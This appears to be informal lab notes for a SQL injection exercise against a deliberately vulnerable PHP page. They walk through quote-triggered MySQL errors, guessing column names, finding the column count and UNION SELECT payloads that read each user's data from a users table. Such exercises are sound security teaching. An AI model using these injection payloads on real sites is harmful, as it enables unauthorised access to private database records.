list.php
- Try it.
- View source
- it calls view1.php?id=1 or id=2, so we know the id's and
the table called users.
- We know that Mickey Mouse's id is 1.
view1.php
- Try view1.php?id=3
- Try view1.php?id=3'
- You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near '' LIMIT 1' at line 1 in SELECT * FROM users WHERE id=3'
LIMIT 1
- So we now the table name and the form of the SQL.
- The LIMIT 1 is going to be a problem if we want to see everything.
- Try view1.php?id=1 AND XXX IS NULL
- Unknown column 'XXX' in 'where clause' in SELECT * FROM users WHERE id=1 and barf IS NULL LIMIT 1
- Try view1.php?id=1 AND age IS NULL
- There's a name, probably first and last. Try some other things.
- Maybe we find first_name and last_name, maybe not.
- Can we determine the number of columns; try id=1 union all select 1
- Get an error, so there's more than one column; by trial and error, we
find there are 4 columns.
- Try: id=1 union all select 1,2,3,4 from users;
- First name is column 2, last name is column 3, id and age are 1 and 4.
- Try: id=1 union all select age,age,age,age from users;
- We get Mickey Mouse as before
- Try: id=99 union all select age,age,age,age from users;
- We get 81,81. That's probably the age of the first user.
- Try: Try: id=99 union all select age,age,age,age from users where id=1; --
- Try: Try: id=99 union all select age,age,age,age from users where id=2; --
- Get the age of the user with id=2
- Or try with first_name
- Mickey is 81
Now try the other views